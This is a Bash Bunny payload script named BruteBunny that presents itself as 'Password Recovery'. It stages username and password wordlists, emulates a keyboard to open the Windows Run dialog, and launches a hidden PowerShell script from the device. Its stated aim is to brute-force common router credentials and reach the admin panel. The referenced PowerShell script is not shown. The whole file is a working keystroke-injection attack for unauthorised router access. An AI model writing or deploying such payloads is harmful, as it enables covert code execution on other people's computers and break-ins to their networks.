#!/bin/bash
#
# Title:         BruteBunny
# Author:        Decoy
# Version:       1.0
# Category:      Password Recovery
# Target:        Windows XP SP3+
# 
# Description:   Will attempt to bruteforce common router username/password combinations in an attempt to gain
#                access to the admin panel.

# init
LED R B

# need SWITCH_POSITION, so give it to me. please. thank you.
source bunny_helpers.sh

# set up the things to make it do stuff
mkdir -p /root/udisk/BruteBunny/loot
mkdir -p /root/udisk/BruteBunny/wordlists

# move wordlists to BruteBunny folder
cp /root/udisk/payloads/$SWITCH_POSITION/usernames.txt /root/udisk/BruteBunny/wordlists/usernames.txt
cp /root/udisk/payloads/$SWITCH_POSITION/passwords.txt /root/udisk/BruteBunny/wordlists/passwords.txt
sync;sleep 1;sync

# set attack mode
ATTACKMODE HID STORAGE

# wait for storage
LED R G B 100
QUACK DELAY 6000
QUACK GUI r
QUACK DELAY 100
# unleash the brute bunny
LED B 100
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\brutebunny.ps1')"
QUACK ENTER
sleep 10

# sync the stuff
sync;sleep 1;sync

LED G